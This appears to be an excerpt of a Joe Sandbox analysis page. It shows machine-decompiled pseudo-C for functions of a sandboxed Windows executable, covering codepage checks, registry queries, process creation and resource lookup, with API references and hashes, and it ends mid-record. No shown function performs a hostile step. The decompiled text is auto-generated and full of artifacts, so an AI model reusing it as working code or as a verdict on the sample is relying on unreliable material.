Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Open
String ID: System\CurrentControlSet\Control\Windows
API String ID: 71445658-1109719901
Opcode ID: dc0859697dd59c0a2e250410b90aaf10cd4a65a049fe44066cf05cc0df631d6b
Instruction ID: c14f98e10822ea0f36fe4910291e55874a20af8805c50e0619ea9c3326161129
Opcode Fuzzy Hash: dc0859697dd59c0a2e250410b90aaf10cd4a65a049fe44066cf05cc0df631d6b
Instruction Fuzzy Hash: 5BD09E72910128BBEB009A89DC81DF7775DDB15760F44401BF90497141C5B4AC5197E4

Uniqueness

Uniqueness Score: -1.00%

Function 0047C570 Relevance: 3.2, APIs: 2, Instructions: 160
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0047C570(long __eax, void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				intOrPtr _t27;
				void* _t32;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t55;
				intOrPtr _t59;
				intOrPtr _t63;
				struct HWND__* _t65;
				int _t66;
				intOrPtr _t67;
				void* _t70;
				void* _t72;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t98;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				void* _t120;
				void* _t123;
				void* _t124;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				long _t131;
				void* _t134;

				_t94 = __ecx;
				_t26 = __eax;
				_t131 = __eax;
				_t134 = _t131 -  *0x498c38; // 0x0
				if(_t134 == 0) {
					L28:
					return _t26;
				} else {
					_t27 =  *0x49b2e4; // 0x22679c0
					_t92 = E0040B424(_t27, __eax);
					_push(E00403574( *((intOrPtr*)(_t92 + 0x18))));
					_t2 = _t92 + 0x18; // 0x18
					_t32 = E00403744(_t2);
					_pop(_t98);
					E00450860(_t32, _t94, _t98);
					 *0x498c38 = _t131;
					E00403AC0(0x49b2a0, _t92, 0x430e54, _t120, 0x49b2a0);
					_t126 = _t92;
					memcpy(0x49b2a0, _t126, 0x10 << 2);
					_t123 = _t126 + 0x20;
					asm("movsb");
					_t4 = _t123 - 0x41; // 0x49b25f
					_t127 = 0x49b2a0;
					E00403ACC(_t4, 0x430e54);
					if( *((intOrPtr*)(_t127 + 0x28)) == 0x411 && GetACP() == 0x3a4 &&  *0x49b380 < 0x5010000 && E0042E21C(0x47c7c8, _t92) != 0) {
						_t6 = _t127 + 0x10; // 0x49b2b0
						E00403450(_t6, _t92, 0x47c7c8, _t123, _t127);
						 *((intOrPtr*)(_t127 + 0x38)) = 0xc;
						if( *0x49b380 < 0x5000000) {
							_t8 = _t127 + 8; // 0x49b2a8
							E00403450(_t8, _t92, 0x47c7c8, _t123, _t127);
							 *((intOrPtr*)(_t127 + 0x30)) = 9;
							_t10 = _t127 + 0xc; // 0x49b2ac
							E00403450(_t10, _t92, 0x47c7c8, _t123, _t127);
							 *((intOrPtr*)(_t127 + 0x34)) = 0x1d;
							_t12 = _t127 + 0x14; // 0x49b2b4
							E00403450(_t12, _t92, 0x47c7c8, _t123, _t127);
							 *((intOrPtr*)(_t127 + 0x3c)) = 9;
						}
					}
					if( *((intOrPtr*)(_t92 + 0x1c)) == 0) {
						_t101 =  *0x49b1d4; // 0x0
						E00403450(0x49b32c, _t92, _t101, _t123, _t127);
					} else {
						E00403450(0x49b32c, _t92,  *((intOrPtr*)(_t92 + 0x1c)), _t123, _t127);
					}
					if( *((intOrPtr*)(_t92 + 0x20)) == 0) {
						_t102 =  *0x49b1d8; // 0x0
						E00403450(0x49b330, _t92, _t102, _t123, _t127);
					} else {
						E00403450(0x49b330, _t92,  *((intOrPtr*)(_t92 + 0x20)), _t123, _t127);
					}
					_t142 =  *((intOrPtr*)(_t92 + 0x24));
					if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
						_t103 =  *0x49b1dc; // 0x0
						E00403450(0x49b334, _t92, _t103, _t123, _t127);
					} else {
						E00403450(0x49b334, _t92,  *((intOrPtr*)(_t92 + 0x24)), _t123, _t127);
					}
					_t20 = _t127 + 0x40; // 0x0
					E0042ED78( *_t20);
					_t47 =  *0x49ad90; // 0x227da78
					E0042ED40(0, 0, E00403738(_t47), _t142);
					_t51 =  *0x49acac; // 0x227ca40
					E0042ED40(1, 0, E00403738(_t51), _t142);
					_t55 =  *0x49ad38; // 0x227d27c
					E0042ED40(2, 0, E00403738(_t55), _t142);
					_t59 =  *0x49ad38; // 0x227d27c
					E0042ED40(3, 0, E00403738(_t59), _t142);
					_t108 =  *0x49ae78; // 0x227eb84
					_t63 =  *0x49a628; // 0x2262410
					E004242AC(_t63, _t108, _t123);
					_t26 =  *0x49b2f0; // 0x22679fc
					_t129 =  *((intOrPtr*)(_t26 + 8)) - 1;
					if(_t129 < 0) {
						L26:
						if( *0x49b09c == 0) {
							goto L28;
						}
						_t65 =  *0x49b0a0; // 0x4023c
						_t66 = SendNotifyMessageA(_t65, 0x496, 0x2711, _t131); // executed
						return _t66;
					} else {
						_t130 = _t129 + 1;
						_t124 = 0;
						do {
							_t67 =  *0x49b2f0; // 0x22679fc
							_t93 = E0040B424(_t67, _t124);
							_t70 =  *((intOrPtr*)(_t93 + 0x25)) - 1;
							if(_t70 == 0) {
								_t23 = _t93 + 4; // 0x4
								_t110 =  *0x49ad74; // 0x227d8b4
								_t26 = E00403450(_t23, _t93, _t110, _t124, _t130);
							} else {
								_t72 = _t70 - 1;
								if(_t72 == 0) {
									_t24 = _t93 + 4; // 0x4
									_t111 =  *0x49ac94; // 0x227c82c
									_t26 = E00403450(_t24, _t93, _t111, _t124, _t130);
								} else {
									_t26 = _t72 - 1;
									if(_t26 == 0) {
										_t25 = _t93 + 4; // 0x4
										_t112 =  *0x49acb4; // 0x227caac
										_t26 = E00403450(_t25, _t93, _t112, _t124, _t130);
									}
								}
							}
							_t124 = _t124 + 1;
							_t130 = _t130 - 1;
						} while (_t130 != 0);
						goto L26;
					}
				}
			}

0x0047c570
0x0047c570
0x0047c574
0x0047c57b
0x0047c581
0x0047c7bf
0x0047c7bf
0x0047c587
0x0047c589
0x0047c593
0x0047c59d
0x0047c59e
0x0047c5a1
0x0047c5a6
0x0047c5a7
0x0047c5ac
0x0047c5b9
0x0047c5c1
0x0047c5c8
0x0047c5c8
0x0047c5ca
0x0047c5cb
0x0047c5ce
0x0047c5d4
0x0047c5e0
0x0047c60c
0x0047c614
0x0047c619
0x0047c62a
0x0047c62c
0x0047c634
0x0047c639
0x0047c640
0x0047c648
0x0047c64d
0x0047c654
0x0047c65c
0x0047c661
0x0047c661
0x0047c62a
0x0047c66c
0x0047c682
0x0047c688
0x0047c66e
0x0047c676
0x0047c676
0x0047c691
0x0047c6a7
0x0047c6ad
0x0047c693
0x0047c69b
0x0047c69b
0x0047c6b2
0x0047c6b6
0x0047c6cc
0x0047c6d2
0x0047c6b8
0x0047c6c0
0x0047c6c0
0x0047c6d7
0x0047c6da
0x0047c6df
0x0047c6ed
0x0047c6f2
0x0047c700
0x0047c705
0x0047c713
0x0047c718
0x0047c726
0x0047c72b
0x0047c731
0x0047c736
0x0047c73b
0x0047c743
0x0047c746
0x0047c79c
0x0047c7a3
0x00000000
0x00000000
0x0047c7b0
0x0047c7b6
0x00000000
0x0047c748
0x0047c748
0x0047c749
0x0047c74b
0x0047c74d
0x0047c757
0x0047c75c
0x0047c75e
0x0047c76a
0x0047c76d
0x0047c773
0x0047c760
0x0047c760
0x0047c762
0x0047c77a
0x0047c77d
0x0047c783
0x0047c764
0x0047c764
0x0047c766
0x0047c78a
0x0047c78d
0x0047c793
0x0047c793
0x0047c766
0x0047c762
0x0047c798
0x0047c799
0x0047c799
0x00000000
0x0047c74b
0x0047c746

APIs

GetACP.KERNEL32(?,?,00000001,00000000,0047C84F,?,-0000001A,0047E7AE,-00000010,?,00000004,0000001A,00000000,0047EAFB,?,0045CF04), ref: 0047C5E6

Part of subcall function 0042E21C: 740BAC50.USER32(00000000,00000000,0047EB62,?,?,00000001,00000000,00000002,00000000,0047F4AB,?,?,?,?,?,00496FD2), ref: 0042E22B
Part of subcall function 0042E21C: EnumFontsA.GDI32(?,00000000,0042E208,00000000,00000000,0042E274,?,00000000,00000000,0047EB62,?,?,00000001,00000000,00000002,00000000), ref: 0042E256
Part of subcall function 0042E21C: 740BB380.USER32(00000000,?,0042E27B,00000000,00000000,0042E274,?,00000000,00000000,0047EB62,?,?,00000001,00000000,00000002,00000000), ref: 0042E26E

SendNotifyMessageA.USER32(0004023C,00000496,00002711,-00000001), ref: 0047C7B6

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B380EnumFontsMessageNotifySend
String ID:
API String ID: 3366876230-0
Opcode ID: 197c8981259148e54bb0a07dac90ff0cb3275dda38bfca97d7a3ecd20483d5d5
Instruction ID: 3152a9e13b81b0b5460fd10549f24f80d72af0acc03c8ee3388a5baaa57f31f4
Opcode Fuzzy Hash: 197c8981259148e54bb0a07dac90ff0cb3275dda38bfca97d7a3ecd20483d5d5
Instruction Fuzzy Hash: 545150746001058BCB20FF26E9C1A9B37D9EB54709B50C53FA8489B366CB3CDD468B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0042DB00 Relevance: 3.1, APIs: 2, Instructions: 113
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042DB00(void* __eax, void* __ebx, intOrPtr __ecx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				char _v24;
				long _t44;
				signed int _t56;
				char _t64;
				intOrPtr _t80;
				void* _t85;
				signed int _t89;
				signed int _t90;
				void* _t93;

				_v24 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t85 = __eax;
				_push(_t93);
				_push(0x42dc38);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93 + 0xffffffec;
				while(1) {
					_v20 = 0;
					_t44 = RegQueryValueExA(_t85, _v8, 0,  &_v16, 0,  &_v20); // executed
					if(_t44 != 0 || _v16 != _a8 && _v16 != _a4) {
						break;
					}
					if(_v20 != 0) {
						__eflags = _v20 - 0x70000000;
						if(_v20 >= 0x70000000) {
							E00408BE0();
						}
						_t87 = _v20;
						__eflags = _v20;
						E004034E0( &_v24, _t87 >> 0, 0, _v20);
						_t56 = RegQueryValueExA(_t85, _v8, 0,  &_v16, E00403744( &_v24),  &_v20); // executed
						__eflags = _t56 - 0xea;
						if(_t56 == 0xea) {
							continue;
						} else {
							__eflags = _t56;
							if(_t56 != 0) {
								break;
							}
							__eflags = _v16 - _a8;
							if(_v16 == _a8) {
								L12:
								_t89 = _v20;
								__eflags = _t89;
								_t90 = _t89 >> 0;
								while(1) {
									__eflags = _t90;
									if(_t90 == 0) {
										break;
									}
									_t64 = _v24;
									__eflags =  *((char*)(_t64 + _t90 - 1));
									if( *((char*)(_t64 + _t90 - 1)) == 0) {
										_t90 = _t90 - 1;
										__eflags = _t90;
										continue;
									}
									break;
								}
								__eflags = _v16 - 7;
								if(_v16 == 7) {
									__eflags = _t90;
									if(_t90 != 0) {
										_t90 = _t90 + 1;
										__eflags = _t90;
									}
								}
								E004038A4( &_v24, _t90);
								__eflags = _v16 - 7;
								if(_v16 == 7) {
									__eflags = _t90;
									if(_t90 != 0) {
										(E00403744( &_v24))[_t90 - 1] = 0;
									}
								}
								E00403450(_v12, 0, _v24, _t85, _t90);
								break;
							}
							__eflags = _v16 - _a4;
							if(_v16 != _a4) {
								break;
							}
							goto L12;
						}
					} else {
						E00403400(_v12);
						break;
					}
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E0042DC3F);
				return E00403400( &_v24);
			}

0x0042db0b
0x0042db0e
0x0042db11
0x0042db14
0x0042db18
0x0042db19
0x0042db1e
0x0042db21
0x0042db26
0x0042db28
0x0042db3c
0x0042db43
0x00000000
0x00000000
0x0042db61
0x0042db72
0x0042db79
0x0042db7b
0x0042db7b
0x0042db80
0x0042db83
0x0042db8f
0x0042dbac
0x0042dbb1
0x0042dbb6
0x00000000
0x0042dbbc
0x0042dbbc
0x0042dbbe
0x00000000
0x00000000
0x0042dbc3
0x0042dbc6
0x0042dbd0
0x0042dbd0
0x0042dbd3
0x0042dbd5
0x0042dbdb
0x0042dbdb
0x0042dbdd
0x00000000
0x00000000
0x0042dbdf
0x0042dbe2
0x0042dbe7
0x0042dbda
0x0042dbda
0x00000000
0x0042dbda
0x00000000
0x0042dbe7
0x0042dbe9
0x0042dbed
0x0042dbef
0x0042dbf1
0x0042dbf3
0x0042dbf3
0x0042dbf3
0x0042dbf1
0x0042dbf9
0x0042dbfe
0x0042dc02
0x0042dc04
0x0042dc06
0x0042dc10
0x0042dc10
0x0042dc06
0x0042dc1b
0x00000000
0x0042dc20
0x0042dbcb
0x0042dbce
0x00000000
0x00000000
0x00000000
0x0042dbce
0x0042db63
0x0042db66
0x00000000
0x0042db6b
0x0042db61
0x0042dc24
0x0042dc27
0x0042dc2a
0x0042dc37

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC38), ref: 0042DB3C
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC38), ref: 0042DBAC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7db11f5e848f54ab45960ad4a331e9941b33df6e03846baf119b41bd5d3ae497
Instruction ID: 91e3d4c21a9af377e9973101783565063810c8d1f91dc5a268d0837cd0fd02c9
Opcode Fuzzy Hash: 7db11f5e848f54ab45960ad4a331e9941b33df6e03846baf119b41bd5d3ae497
Instruction Fuzzy Hash: 01414F71E00129AFDB11DF96D991BAFBBB8AB04704F91856AE810F7240D778AE40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042DDC0 Relevance: 3.1, APIs: 2, Instructions: 111
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042DDC0(char __eax, void* __ebx, char* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char _v24;
				int _v28;
				long _t38;
				long _t47;
				long _t54;
				void* _t56;
				int _t65;
				intOrPtr _t78;
				intOrPtr _t83;
				void* _t89;
				void* _t90;
				intOrPtr _t91;

				_t87 = __esi;
				_t86 = __edi;
				_t89 = _t90;
				_t91 = _t90 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t89);
				_push(0x42df03);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91;
				if(_v16 == 0 ||  *_v16 == 0) {
					L14:
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(E0042DF0A);
					return E00403400( &_v24);
				} else {
					__eflags =  *0x4980dc - 2;
					if( *0x4980dc != 2) {
						L13:
						E0042DD44(_v5, _v16, _v12);
						goto L14;
					} else {
						_t38 = E0042DD1C(_v5, _v16, _v12,  &_v20, 8, 0); // executed
						__eflags = _t38;
						if(__eflags != 0) {
							goto L13;
						} else {
							_push(_t89);
							_push(0x42ded6);
							_push( *[fs:edx]);
							 *[fs:edx] = _t91;
							E004034E0( &_v24, 0x100, 0, __eflags);
							_t65 = 0;
							__eflags = 0;
							while(1) {
								L6:
								_v28 = E00403574(_v24);
								_t47 = RegEnumKeyExA(_v20, _t65, E00403744( &_v24),  &_v28, 0, 0, 0, 0);
								__eflags = _t47 - 0xea;
								if(_t47 != 0xea) {
									break;
								}
								_t56 = E00403574(_v24);
								__eflags = _t56 - 0x10000;
								if(_t56 < 0x10000) {
									E004034E0( &_v24, E00403574(_v24) + _t58, 0, __eflags);
									continue;
								}
								L12:
								__eflags = 0;
								_pop(_t83);
								 *[fs:eax] = _t83;
								_push(E0042DEDD);
								return RegCloseKey(_v20);
								goto L15;
							}
							__eflags = _t47;
							if(_t47 == 0) {
								_t54 = E0042DDC0(_v5, _t65, E00403738(_v24), _v20, _t86, _t87);
								__eflags = _t54;
								if(_t54 != 0) {
									_t65 = _t65 + 1;
								}
								goto L6;
							}
							goto L12;
						}
					}
				}
				L15:
			}

0x0042ddc0
0x0042ddc0
0x0042ddc1
0x0042ddc3
0x0042ddc6
0x0042ddc7
0x0042ddc8
0x0042ddcb
0x0042ddce
0x0042ddd1
0x0042ddd4
0x0042ddd9
0x0042ddda
0x0042dddf
0x0042dde2
0x0042dde9
0x0042deed
0x0042deef
0x0042def2
0x0042def5
0x0042df02
0x0042ddfd
0x0042ddfd
0x0042de04
0x0042dedd
0x0042dee6
0x00000000
0x0042de0a
0x0042de1b
0x0042de20
0x0042de22
0x00000000
0x0042de28
0x0042de2a
0x0042de2b
0x0042de30
0x0042de33
0x0042de40
0x0042de45
0x0042de45
0x0042de47
0x0042de47
0x0042de4f
0x0042de6c
0x0042de71
0x0042de76
0x00000000
0x00000000
0x0042de7b
0x0042de80
0x0042de85
0x0042de98
0x00000000
0x0042de98
0x0042debf
0x0042debf
0x0042dec1
0x0042dec4
0x0042dec7
0x0042ded5
0x00000000
0x0042ded5
0x0042de9f
0x0042dea1
0x0042deb3
0x0042deb8
0x0042deba
0x0042debc
0x0042debc
0x00000000
0x0042deba
0x00000000
0x0042dea1
0x0042de22
0x0042de04
0x00000000

APIs

RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DED6,?,?,00000008,00000000,00000000,0042DF03), ref: 0042DE6C
RegCloseKey.ADVAPI32(?,0042DEDD,?,00000000,00000000,00000000,00000000,00000000,0042DED6,?,?,00000008,00000000,00000000,0042DF03), ref: 0042DED0

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseEnum
String ID:
API String ID: 2818636725-0
Opcode ID: cb98cc3ae80dacffce083ce26f8b711a4019fc3e0b95e09fc8e794454e1b8392
Instruction ID: e7d19d48aa7e0d86dc945916bf2bb8546aa8c3ec23a2ebc9bd60cf0b03d82033
Opcode Fuzzy Hash: cb98cc3ae80dacffce083ce26f8b711a4019fc3e0b95e09fc8e794454e1b8392
Instruction Fuzzy Hash: 7931A270F04648AFDB11DFA6DC42BAFB7B9EB45304F91447BE500E7281D6785A01CA69

Uniqueness

Uniqueness Score: -1.00%

Function 00451B48 Relevance: 3.1, APIs: 2, Instructions: 60
processCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00451B48(void* __eax, CHAR* __ecx, CHAR* __edx, void* __eflags, struct _PROCESS_INFORMATION* _a4, struct _STARTUPINFOA* _a8, CHAR* _a12, void* _a16, long _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, struct _SECURITY_ATTRIBUTES* _a32) {
				int _v8;
				char _v16;
				long _v20;
				int _t27;
				intOrPtr _t42;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t50 = _t52;
				_t53 = _t52 + 0xfffffff0;
				if(E00451A84(__eax,  &_v16) != 0) {
					_push(_t50);
					_push(0x451bc2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t53;
					_t27 = CreateProcessA(__edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
					_v8 = _t27;
					_v20 = GetLastError();
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E00451BC9);
					return E00451AC0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00451b49
0x00451b4b
0x00451b63
0x00451b6e
0x00451b6f
0x00451b74
0x00451b77
0x00451b9c
0x00451ba1
0x00451ba9
0x00451bae
0x00451bb1
0x00451bb4
0x00451bc1
0x00451b65
0x00451b67
0x00451bdb
0x00451bdb

APIs

CreateProcessA.KERNEL32(00000000,00000000,?,?,004570C0,00000000,004570A8,?,?,?,00000000,00451BC2,?,?,?,00000001), ref: 00451B9C
GetLastError.KERNEL32(00000000,00000000,?,?,004570C0,00000000,004570A8,?,?,?,00000000,00451BC2,?,?,?,00000001), ref: 00451BA4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID:
API String ID: 2919029540-0
Opcode ID: 3c8082e2a01157f1419d6f228db75622c9fd29d04a9264d132d81f14a429efee
Instruction ID: b02d4c0ed9d20df4d5ab504750d90f14c4f2a017718fa5a0f45c46dfac375986
Opcode Fuzzy Hash: 3c8082e2a01157f1419d6f228db75622c9fd29d04a9264d132d81f14a429efee
Instruction Fuzzy Hash: F5117972A00248AF8B40CEA9DC41EDFB7ECEB4C314B1145A6BD18D3211E638AD148B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFB0 Relevance: 3.1, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040AFB0(void* __eax, intOrPtr* __edx, void* __edi) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				signed int _t10;
				signed int _t11;
				intOrPtr _t17;
				intOrPtr* _t22;
				struct HINSTANCE__* _t26;
				void* _t30;
				intOrPtr _t33;
				void* _t36;
				intOrPtr _t39;
				intOrPtr _t41;

				_t39 = _t41;
				_t22 = __edx;
				_t36 = __eax;
				_t8 = E00403738(__eax);
				_t9 =  *0x49a014; // 0x400000
				_t10 = FindResourceA(_t9, _t8, 0xa);
				_t30 = _t10;
				_t11 = _t10 & 0xffffff00 | _t30 != 0x00000000;
				_t43 = _t11;
				if(_t11 == 0) {
					return _t11;
				} else {
					FreeResource(_t30);
					_t26 =  *0x49a014; // 0x400000
					_v8 = E0040D124(_t26, 1, 0xa, _t36);
					_push(_t39);
					_push(0x40b028);
					_push( *[fs:eax]);
					 *[fs:eax] = _t41;
					_t17 = E0040CD7C(_v8, _t22,  *_t22, __edi, _t36, _t43); // executed
					 *_t22 = _t17;
					_pop(_t33);
					 *[fs:eax] = _t33;
					_push(E0040B02F);
					return E00402B58(_v8);
				}
			}

0x0040afb1
0x0040afb6
0x0040afb8
0x0040afbe
0x0040afc4
0x0040afca
0x0040afcf
0x0040afd3
0x0040afd6
0x0040afd8
0x0040b035
0x0040afda
0x0040afdb
0x0040afe3
0x0040aff5
0x0040affa
0x0040affb
0x0040b000
0x0040b003
0x0040b00b
0x0040b010
0x0040b014
0x0040b017
0x0040b01a
0x0040b027
0x0040b027

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFCA
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B127,00000000,0040B13F,?,?,?,00000000), ref: 0040AFDB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: beee36ceef9b26ac9a568e967767a6658c16425fccd9034a0460764512df3d85
Instruction ID: f5282dc9d2a05e173a7180cca0480f834172270a28f0af8e578ec16cf54e8ff1
Opcode Fuzzy Hash: beee36ceef9b26ac9a568e967767a6658c16425fccd9034a0460764512df3d85
Instruction Fuzzy Hash: BF01F2B1300700AFDB10EF69DC92E6A77EDDB4A7547118077F400AB2D0DA3EAC1096AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE8C Relevance: 3.0, APIs: 2, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041EE8C(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v8 = 0;
				_t23 =  *0x498580; // 0x0
				_v12 = _t23;
				_t24 =  *0x49858c; // 0x0
				_v16 = _t24;
				 *0x498580 = __eax;
				 *0x49858c = 0;
				_push(_t30);
				_push(0x41ef2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(_t30);
				_push(0x41eef8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(0);
				_push(E0041EE3C);
				_push(GetCurrentThreadId()); // executed
				L00405EA4(); // executed
				_v8 =  *0x49858c;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0041EF36);
				 *0x49858c = _v16;
				_t16 = _v12;
				 *0x498580 = _t16;
				return _t16;
			}

0x0041ee8d
0x0041ee8f
0x0041ee97
0x0041ee9a
0x0041eea0
0x0041eea3
0x0041eea9
0x0041eeac
0x0041eeb3
0x0041eeba
0x0041eebb
0x0041eec0
0x0041eec3
0x0041eec8
0x0041eec9
0x0041eece
0x0041eed1
0x0041eed4
0x0041eed6
0x0041eee0
0x0041eee1
0x0041eeeb
0x0041eef0
0x0041eef3
0x0041ef13
0x0041ef16
0x0041ef19
0x0041ef21
0x0041ef26
0x0041ef29
0x0041ef2e

APIs

GetCurrentThreadId.KERNEL32 ref: 0041EEDB
740BAC10.USER32(00000000,0041EE3C,00000000,00000000,0041EEF8,?,00000000,0041EF2F,?,0042EB08,?,00000001), ref: 0041EEE1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 3e0c9b82023ef9eb735939eab937add120b80a23ec4c916cd8f99a387fd18bdf
